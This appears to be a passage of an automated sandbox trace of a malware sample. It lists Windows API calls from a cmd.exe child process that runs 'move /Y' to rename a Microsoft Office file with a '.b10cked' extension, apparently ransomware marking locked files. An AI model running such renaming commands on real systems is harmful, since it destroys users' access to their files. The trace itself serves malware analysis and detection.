FindNextFileW (in: hFindFile=0x4c0e68, lpFindFileData=0x4d1bd8 | out: lpFindFileData=0x4d1bd8) returned 0 [0197.633] FindClose (in: hFindFile=0x4c0e68 | out: hFindFile=0x4c0e68) returned 1 [0197.633] GetLastError () returned 0x12 [0197.633] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x4d1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4d1bd8) returned 0x4c0e68 [0197.633] FindNextFileW (in: hFindFile=0x4c0e68, lpFindFileData=0x4d1bd8 | out: lpFindFileData=0x4d1bd8) returned 0 [0197.633] FindClose (in: hFindFile=0x4c0e68 | out: hFindFile=0x4c0e68) returned 1 [0197.634] GetLastError () returned 0x12 [0197.634] _get_osfhandle (_FileHandle=2) returned 0xb [0197.634] GetFileType (hFile=0xb) returned 0x2 [0197.634] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0197.634] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2eee2c | out: lpMode=0x2eee2c) returned 1 [0197.634] _get_osfhandle (_FileHandle=2) returned 0xb [0197.634] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2eee60 | out: lpConsoleScreenBufferInfo=0x2eee60) returned 1 [0197.634] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0197.635] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eeea0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0197.635] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x2eee84, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eee84*=0x2c) returned 1 [0197.635] longjmp () [0197.636] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.636] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.636] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.636] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0197.636] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.636] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0197.636] SetConsoleInputExeNameW () returned 0x1 [0197.636] GetConsoleOutputCP () returned 0x1b5 [0197.636] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.636] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.636] exit (_Code=1) Process: id = "460" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0x6d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29101 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29102 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29103 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29104 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 29105 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29106 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29107 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29108 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29109 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 29110 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29145 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29146 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29147 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29148 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 29149 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 29150 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29151 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29152 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29153 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29154 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29155 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29156 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29157 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29158 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29159 start_va = 0x390000 end_va = 0x457fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 29160 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29161 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29162 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29163 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 29164 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 29165 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 29166 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 29167 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 29168 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 29193 start_va = 0x460000 end_va = 0x51ffff entry_point = 0x460000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 655 os_tid = 0xbcc [0197.439] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fb8c | out: lpSystemTimeAsFileTime=0x18fb8c*(dwLowDateTime=0xaa7ffc00, dwHighDateTime=0x1d440a9)) [0197.440] GetCurrentProcessId () returned 0x6d8 [0197.440] GetCurrentThreadId () returned 0xbcc [0197.440] GetTickCount () returned 0x37ea1 [0197.440] QueryPerformanceCounter (in: lpPerformanceCount=0x18fb84 | out: lpPerformanceCount=0x18fb84*=25422880074) returned 1 [0197.440] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0197.440] __set_app_type (_Type=0x1) [0197.440] __p__fmode () returned 0x76b331f4 [0197.440] __p__commode () returned 0x76b331fc [0197.440] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0197.440] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0197.441] GetCurrentThreadId () returned 0xbcc [0197.441] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbcc) returned 0x38 [0197.441] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0197.441] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0197.441] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.441] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0197.441] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fb1c | out: phkResult=0x18fb1c*=0x0) returned 0x2 [0197.441] VirtualQuery (in: lpAddress=0x18fb53, lpBuffer=0x18faec, dwLength=0x1c | out: lpBuffer=0x18faec*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0197.441] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18faec, dwLength=0x1c | out: lpBuffer=0x18faec*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0197.441] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18faec, dwLength=0x1c | out: lpBuffer=0x18faec*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0197.441] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18faec, dwLength=0x1c | out: lpBuffer=0x18faec*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0197.441] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18faec, dwLength=0x1c | out: lpBuffer=0x18faec*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0197.441] GetConsoleOutputCP () returned 0x1b5 [0197.441] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.441] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0197.441] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.441] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0197.442] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.442] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0197.442] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.442] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.443] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.443] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0197.443] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.443] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0197.443] GetEnvironmentStringsW () returned 0x2a0190* [0197.443] FreeEnvironmentStringsW (penv=0x2a0190) returned 1 [0197.443] GetEnvironmentStringsW () returned 0x2a0190* [0197.444] FreeEnvironmentStringsW (penv=0x2a0190) returned 1 [0197.444] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ea8c | out: phkResult=0x18ea8c*=0x40) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x0, lpData=0x18ea98*=0xb8, lpcbData=0x18ea90*=0x1000) returned 0x2 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x1, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x0, lpData=0x18ea98*=0x1, lpcbData=0x18ea90*=0x1000) returned 0x2 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x0, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x40, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x40, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x0, lpData=0x18ea98*=0x40, lpcbData=0x18ea90*=0x1000) returned 0x2 [0197.444] RegCloseKey (hKey=0x40) returned 0x0 [0197.444] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ea8c | out: phkResult=0x18ea8c*=0x40) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x0, lpData=0x18ea98*=0x40, lpcbData=0x18ea90*=0x1000) returned 0x2 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x1, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x0, lpData=0x18ea98*=0x1, lpcbData=0x18ea90*=0x1000) returned 0x2 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x0, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x9, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.444] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x4, lpData=0x18ea98*=0x9, lpcbData=0x18ea90*=0x4) returned 0x0 [0197.445] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ea94, lpData=0x18ea98, lpcbData=0x18ea90*=0x1000 | out: lpType=0x18ea94*=0x0, lpData=0x18ea98*=0x9, lpcbData=0x18ea90*=0x1000) returned 0x2 [0197.445] RegCloseKey (hKey=0x40) returned 0x0 [0197.445] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639f [0197.445] srand (_Seed=0x5b88639f) [0197.445] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked\"" [0197.445] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked\"" [0197.445] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.445] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a18f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0197.446] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0197.446] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0197.446] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0197.446] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0197.446] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0197.446] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0197.446] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0197.446] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0197.446] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0197.446] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0197.446] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0197.446] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0197.446] GetEnvironmentStringsW () returned 0x2a22e0* [0197.446] FreeEnvironmentStringsW (penv=0x2a22e0) returned 1 [0197.446] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.446] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0197.446] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0197.446] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0197.446] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0197.446] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0197.446] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0197.447] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0197.447] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0197.447] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0197.447] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f858 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.447] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f858, lpFilePart=0x18f854 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f854*="Desktop") returned 0x18 [0197.447] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0197.447] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f5d4 | out: lpFindFileData=0x18f5d4) returned 0x2a0020 [0197.447] FindClose (in: hFindFile=0x2a0020 | out: hFindFile=0x2a0020) returned 1 [0197.447] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f5d4 | out: lpFindFileData=0x18f5d4) returned 0x2a0020 [0197.447] FindClose (in: hFindFile=0x2a0020 | out: hFindFile=0x2a0020) returned 1 [0197.447] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f5d4 | out: lpFindFileData=0x18f5d4) returned 0x2a0020 [0197.448] FindClose (in: hFindFile=0x2a0020 | out: hFindFile=0x2a0020) returned 1 [0197.448] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0197.448] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0197.448] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0197.448] GetEnvironmentStringsW () returned 0x2a2b00* [0197.448] FreeEnvironmentStringsW (penv=0x2a2b00) returned 1 [0197.448] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.449] GetConsoleOutputCP () returned 0x1b5 [0197.449] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.449] GetUserDefaultLCID () returned 0x409 [0197.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0197.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f998, cchData=128 | out: lpLCData="0") returned 2 [0197.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f998, cchData=128 | out: lpLCData="0") returned 2 [0197.449] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f998, cchData=128 | out: lpLCData="1") returned 2 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0197.450] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0197.450] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0197.451] GetConsoleTitleW (in: lpConsoleTitle=0x2908e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.451] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0197.451] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0197.451] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0197.452] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0197.452] _wcsicmp (_String1="move", _String2=")") returned 68 [0197.452] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0197.452] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0197.453] _wcsicmp (_String1="IF", _String2="move") returned -4 [0197.453] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0197.453] _wcsicmp (_String1="REM", _String2="move") returned 5 [0197.453] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0197.456] GetConsoleTitleW (in: lpConsoleTitle=0x18f690, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.457] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0197.457] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0197.457] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0197.457] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0197.457] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0197.457] _wcsicmp (_String1="move", _String2="CD") returned 10 [0197.457] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0197.457] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0197.457] _wcsicmp (_String1="move", _String2="REN") returned -5 [0197.457] _wcsicmp 